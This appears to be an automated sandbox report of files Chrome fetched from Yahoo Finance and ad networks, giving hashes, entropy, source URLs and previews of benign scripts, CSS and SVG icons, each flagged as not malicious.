                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function K(T){return T}var w=function(T){return K.call(this,T)},R=this||self,g=function(T,O,C,U,p,V,u,B,H,E,y,G){for(y=(E=24,U);;)try{if(E==C)break;else if(E==T)R.console[p](G.message),E=O;else if(E==99)y=U,E=29;else if(E==29)E=R.console?T:O;else if(E==76)E=H&&H.createPolicy?35:3;else if(E==24)B=u,H=R.trustedTypes,E=76;else{if(E==O)return y=U,B;if(E==35)y=13,B=H.createPolicy(V,{createHTML:w,createScript:w,createScriptURL:w}),E=O;else if(E==3)return B}}catch(d){if(y==U)throw d;y==13&&(G=d,E=99)}};(0,eval)(function(T,O){return(O=g(51,20,6,5,"error","bg",null))&&T.eval(O.createScript("1"))===1?function(C){return O.createScript(C)}:function(C){return""+C}}(R)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9067)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.191670188907179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:KcbeK1g0sxeE76p5AxDmG+eqvzmsAmE5gSQil+97CrR80Ave:CCAx4blau/ve
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EA614941D7C7935F64F01B9538E9C2BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:06C30E0F14B50259472211381FFFFB9334E889F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EBDB55BAA1003DB3170B80AB3ABFCFB1B1D7518F36337425C667F2258D127850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7EF1237C81547F36FF386095BCB6036F85AC98CF33EFD3B9762435EAA12927325BA13737D1FC1D286FB0B22D36FAA73753E10422FC0EC87F06E953938C701C80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Spinner.DBQ4b_Oq.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:div.yf-usnhox{display:inline-flex;align-items:center;justify-content:center}div.centered.yf-usnhox{display:flex}@keyframes yf-usnhox-counter-ring-animated-2_t{0%{transform:translate(45.3475px,45.3475px) rotate(12.73deg) scale(.75) translate(.49px,130.552px)}0.3%{transform:translate(45.3475px,45.3475px) rotate(12.73deg) scale(.75) translate(.49px,130.552px)}to{transform:translate(45.3475px,45.3475px) rotate(191.2084deg) scale(.75) translate(.49px,130.552px)}}@keyframes yf-usnhox-counter-ring-animated-2_v{0%{visibility:visible;animation-timing-function:steps(1)}to{visibility:visible;animation-timing-function:steps(1)}}@keyframes yf-usnhox-Ellipse-1_o{0%{opacity:.77}0.85%{opacity:.77}1.7%{opacity:0}to{opacity:0}}@keyframes yf-usnhox-Path-1_do{0%{stroke-dashoffset:230px}0.3%{stroke-dashoffset:230px}to{stroke-dashoffset:230px}}@keyframes yf-usnhox-Ellipse-1-2_o{0%{opacity:0}1.15%{opacity:0}1.7%{opacity:.77}24.7%{opacity:0}to{opacity:0}}@keyframes yf-usnhox-Path-1-2_da{0%{stroke-dasharray:31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1274)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.795239734124899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:DHdqCkiX42MaXRX5m5E1HgRidD7TjWcG+AKWJTIVEHK1zpMFqYJC/BHzsmLgm0P:cCkgMahJmOHg8jn0KO7HSbzdG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CAC11CC71C84D5C93A68CC7EED9414AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:78ED32E481B51AFB91AD1FF7D256AF0F53DF99C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2B7868E975C5873173C5BF0AE56CDDB4FA15A64522A4AC55AECA9DB78B180157
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:104F659CFDCBAFF592B285B18DD7C554425E225D091B3C5B704FD231CBE7E0E6E13A5993DBEF859403EB876FF0B237DFFA6A9F02EBC3051AC133DC098E5FAD4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/twitter-x-round.YxAnOas2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" data-name="Layer 1" viewBox="0 0 24 24"><path d="M24 12c0-6.63-5.37-12-12-12S0 5.37 0 12c0 5.99 4.39 10.95 10.12 11.85v-8.39H7.07v-3.47h3.05V9.35c0-3.01 1.79-4.67 4.53-4.67 1.31 0 2.69.23 2.69.23v2.95h-1.51c-1.49 0-1.96.93-1.96 1.87v2.25h3.33l-.53 3.47h-2.8v8.39c5.74-.9 10.12-5.86 10.12-11.85Z"/></svg>',s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0C5.372 0 0 5.372 0 12s5.372 12 12 12 12-5.372 12-12S18.628 0 12 0M8.644 17.02h-2.34V9.534h2.34zM7.41 8.597h-.019c-.848 0-1.397-.572-1.397-1.299 0-.74.567-1.298 1.43-1.298.862 0 1.392.558 1.41 1.298.006.722-.543 1.299-1.424 1.299M18 17.02h-2.653v-3.872c0-1.012-.413-1.706-1.327-1.706-.698 0-1.087.469-1.265.919-.066.16-.057.384-.057.614v4.045h-2.63s.034-6.862 0-7.486h2.63v1.177c.155-.516.994-1.247 2.335-1.247 1.664 0 2.967 1.078 2.967 3.394z"/></svg>',h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.881 17.183h1.49L9.512 7.58H8.02z"/><path
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.208359994763881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:yvOCf5Yi4RixvkfPwR6/RNWc0jnQR0hFEzos:y2nD//Cr4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BD4D30BF2431199179FA9AFBDB1CCB76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D9EDBDAAB2CE633D3B826EC363AA98A8894900D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08C8E3BFE30297FB8AEEE20FC667F6F18AC7F19C49B4987CDD81078BCE8A2100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8BF97C1FEA028DAF20BDCA75591C40AF307078DA2502C6F0F2F951DC9573859B8744F3F9430B110F36ADF8589639B214AA6E5086987D0518A0D6E932F9FE2886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cx/hp-viewer/desktop_1.11.185.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=["ctopid","hashtag","wiki_topics"],n=["defaultLREC","lighthouse","spotlight","bankratewidget"],o=["pd","pt","pct","lmsid","lpstaid","hashtag","pstaid"],a={att:"yhp",autos:"yautos",entertainment:"yent",finance:"yfin",fp:"yhp",gma:"ynews",lifestyle:"ylife",movies:"ymov",music:"yent",news:"ynews",sports:"ysports",style:"ylife",tech:"ytech"},r={hashtag:!0,lang:!0,region:!0,site:!0,spaceid:!0},c=["lmsid","lpstaid","pt","pd","ver","pct"],d=["sda-COMMENTSWFPAD-iframe"];const l=e=>new Promise((t=>setTimeout(t,e))),h=(e,{className:t,id:i,tagName:s})=>{if(e)return t&&!e.classList.contains(t)||i&&i!==e.id||s&&e.tagName!==s?h(e.parentElement,{className:t,id:i,tagName:s}):e},w=t=>{if(!t||t.startsWith("/"))return t;const{hostname:i,pathname:s}=new UR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2703)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):125254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.453842076017645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:MHRPibTkJuVSvW/BvzoZyfvAP+Ghbrc2+heIvPD31XJFNi17:Z1Anc2+hlvbNkV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8AD6B94A6D7182FB73690CA343DCBDE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C631173D130B4E83E69B5B35DBD80586C73237D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:37179B0147D32AF58D6132CADE49DB41E00120816F0B1D5999812297F287454E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1EBFB7337664849C22C18B00A80DD18D245986E9097CFC0D3FB20CE599D0677B02F2ABDEAB752F749C394801CF3522467FAE08819839AD9E3F0CFF57BC24169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/879366/Enabler_01_252.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var DEPS_GRAPH={'enablermodule':[],'configurablemodule':['enablermodule'],'gdnmodule':['enablermodule'],'layoutsmodule':['enablermodule'],'videomodule':['enablermodule'],'layoutsfillermodule':['enablermodule','layoutsmodule'],'rad_ui_videomodule':['videomodule'],'$weak$':['configurablemodule','enablermodule','gdnmodule','layoutsfillermodule','layoutsmodule','rad_ui_videomodule','videomodule']};window.STUDIO_SDK_START=+new Date();var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),k=function(a,b){if(b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2177)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):112805
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.539654577125179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YXP8fph9T1TFj+U+pM7OlXYM+Mn8sQXWdASrtlRhBZLjb6ke13zv7x+:vRh1lcnUGdAElRhBZH+ksTt+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:366DAFF9909083EC6E0C67561FB35EC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EB44AB2F563F148B25F718B31CC24ABBAAF1C3FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:40B3B4542E4D05F6BBD68E7EBA6D424ABFFD64FB9CC3BA8C8C9C932F088C787A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11383C0ADFACB7129612DC521AD45D0E3F77424691E8F80A99293D1ED624C1B4A94C557B2E1A14C73E4096AB5E80827D5A7635DC177D30AE02C0D9B663912884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(stc){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object"); .},da=ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}; .p("Symbol",function(a){if(a)return a;var b=function(f,h){this.nc=f;ba(this,"description",{configurable:!0,writable:!0,value:h})};b.prototype.toString=function(){return this.nc};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (6883)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.499397105162548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:bpO79xe9kziQe5H9PA5LcTMZMhK+PLViTUd+7zS5A6cjhT7n0yzrbPwwlL/CMgX8:VO7C9k+F+LcgVYA/zS6dnNswl2XM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0EC0C906319B5A956623DC94FF377172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04D718469C1AC0F9B37E665282DDB6386795C25D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:36CA276C5FB18B03A37492E31C5CB00AD5D2C6AD9FE96279EB64DA3BACA32A72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:62F28470A6A408077353F83C0ADD874CE7113165E61E1661952900655B21A9C11FB9DF02867EA39343D0252356861E45068C902972ED88BF986595EA8FECF72A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Tooltip.DgP4ayih.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as je,c as G,e as P,b as Y,d as q,f as V,j as I,i as E,q as B,_ as R,U as D,k as U,l as k,u as J,g as K,a as Q,I as Ee,A as Me,t as me,h as _e,B as oe,M as Le,m as Se,P as se}from"./scheduler.Dr9AAxFe.js";import{S as Ne,i as Ce,t as Z,a as x}from"./index.DCSmZEjO.js";import{g as Be}from"./spread.CgU5AtxT.js";import{c as ae,f as fe,o as re,d as ke,s as Ae,a as Oe}from"./floating-ui.dom.C5fi-pG6.js";const Te=i=>({}),ue=i=>({}),pe=i=>({}),ce=i=>({});function de(i){let t;return{c(){t=P("div"),this.h()},l(l){t=q(l,"DIV",{class:!0}),V(t).forEach(E),this.h()},h(){B(t,"class","arrow yf-7dju6j")},m(l,o){U(l,t,o)},d(l){l&&E(t)}}}function He(i){let t,l,o,m=[{class:o=`title ${i[8]}`},i[5]?{id:i[5]}:{}],_={};for(let a=0;a<m.length;a+=1)_=Me(_,m[a]);return{c(){t=P("h3"),l=me(i[3]),this.h()},l(a){t=q(a,"H3",{class:!0});var y=V(t);l=_e(y,i[3]),y.forEach(E),this.h()},h(){oe(t,_),D(t,"yf-7dju6j",!0)},m(a,y){U(a,t,y),k(t,l)},p(a,y){y[0]&8&&Le(l,a[3],_.contenteditable),oe(t,_=Be(m,[y[0]&256&&o!==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8315)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8318
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.372761812055765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:qB4pjCXdUBVCFdSlHHm4sywaRW2VnaUjz6uiEJMdE+neiAsz:qB4YtUzCFYJrXF1aGz6uBJgx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4D3C394FA5B66101BAC3DC40EFE2A113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3E7BC207A1233A1F4D4B9790B45CA771FD17963B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A70F2DC1631C97BD7D6E15675FC70A6C9481A3DC32F1E788D991907EF5D73A9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EFF270EF296A678A50AE171C05947851F76DEA2794B8900B820D15E65E5BAB3C156A56993B13CF538160C03B06FF0F8141DF43488900A2A39EFAB2EF96D4DC01
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ae,c as H,e as E,b as T,d as y,f as I,j as q,i as g,q as v,U as C,k as N,l as S,u as L,g as V,a as M,a4 as fe,_ as z,A as te,B as U,G as le,a0 as ie,n as j,t as ne,h as oe}from"./scheduler.Dr9AAxFe.js";import{S as re,i as ue,t as m,g as D,a as k,e as B}from"./index.DCSmZEjO.js";import{g as se}from"./spread.CgU5AtxT.js";import{g as G}from"./i13nUtil.C-uBpR7k.js";const _e=s=>({}),F=s=>({}),ce=s=>({}),J=s=>({}),he=s=>({}),K=s=>({}),de=s=>({}),P=s=>({}),me=s=>({}),Q=s=>({}),be=s=>({}),W=s=>({});function X(s){let e,a,o,l=(s[14].attribution||s[14].title||s[14].subheading||s[14].header)&&Z(s),t=s[14].topCta&&ee(s);return{c(){e=E("header"),l&&l.c(),a=T(),t&&t.c(),this.h()},l(i){e=y(i,"HEADER",{class:!0});var n=I(e);l&&l.l(n),a=q(n),t&&t.l(n),n.forEach(g),this.h()},h(){v(e,"class","yf-xvi0tx")},m(i,n){N(i,e,n),l&&l.m(e,null),S(e,a),t&&t.m(e,null),o=!0},p(i,n){i[14].attribution||i[14].title||i[14].subheading||i[14].header?l?(l.p(i,n),n&16384&&m(l,1)):(l=Z(i),l.c(),m(l,1),l.m(e,a)):l&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):83615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.372319722661032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:XPpEy5BMibZGOj/bEe8v+/UWf4IhvAQPFZ93E8ud44d+ROvcpbRNkVPEWW9MtXaQ:uIOKpETQRsFrta98HrP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5CA7582261C421482436DFDF3AF9BFFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:98884258CBDB0D939FA2C5E74FC7AC9E56D8170F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F284353A7CC4D97F6FE20A5155131BD43587A0F1C98A56EEAF52CFF72910F47D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA9DBB9EE532954830059247B269B75BB925C2E3398247B8A6B4EF3E89375F9CE2E74CB7328F1C8297977A0596ADD7EE5F217651D2D62BF5826F932FEC228770
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! jQuery v2.1.0 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k="".trim,l={},m=a.document,n="2.1.0",o=function(a,b){return new o.fn.init(a,b)},p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};o.fn=o.prototype={jquery:n,constructor:o,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=o.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return o.each(this,a,b)},map:function(a){return this.pushStack(o.map(this,function(b,c){return a.call(b,c,b)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.063452167873521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHUXpWFUXJISILRU4GUSyvAZIAdSbFS:H69mc4sl3O4UXpCU2x8wvAZ/b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:827499D87703971F05522FDAD0D0936D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9D77F07F4C14B6A96B3914BDE2873B76818B96AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:383A86B47F8C4B9CAC4035415C5C2F66E2B254A26A507614CBA67EB7230DAF57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DBF2DADC523E7264254C082573F60D5F6EE21E720DE6A49E3222D4F4B11F5433C38CB17C6590172521F3C8CCB0A50C0D3E7AE6DA81385BDB74A75A4CEC119565
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 16.17 4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1748)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.444209745064718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:YY7YNYR1m5ABePKTBxj6kDxx12yS1M9O84itGGyBoirdxM6j:t86+A4STflDp9B4YL8oi5xM6j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D92FD68178888768C733A4365A56FC3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:55916ED75FD5C9DF0A7447298E2BCA559CC9583A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E573D7D4E3679F1D578E544C5B807AA4FF21E208BAF12E48AA0D09B2B3938F04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:37CAEE932A7038636D84720960420E701C7659C873188CA400EE0196868D9C5A09BB31F566699ACF54DB0F0FC42BD769F1A141A213C2127C38CE839DACCA8BE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/pagead/js/car.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var e=this||self;/* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ .var f={};function g(){if(f!==f)throw Error("Bad secret");};function h(a){return Object.isFrozen(a)&&Object.isFrozen(a.raw)}function k(a){return a.toString().indexOf("`")===-1}const l=k(a=>a``)||k(a=>a`\0`)||k(a=>a`\n`)||k(a=>a`\u0000`),m=h``&&h`\0`&&h`\n`&&h`\u0000`;let n=globalThis.trustedTypes,p;function q(){let a=null;if(!n)return a;try{const b=d=>d;a=n.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){throw b;}return a};var r=class{constructor(a){g();this.g=a}toString(){return this.g+""}};function t(a){p===void 0&&(p=q());var b=p;return new r(b?b.createScriptURL(a):a)};var v=class{constructor(a){g();this.h=a}toString(){return this.h}};new v("about:blank");new v("about:invalid#zClosurez");const w=[];var x=a=>{console.warn(`A URL with content '${a}' was sanitized away.`)};w.ind
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.756027257143914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:cCgBEbDATWo7pCz8qpI7/+fsQRBMUgyvDDqgMLGUGOCLYRIC1WZGb:cCgBz6o1CzXa7+fsQH/3nsXb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
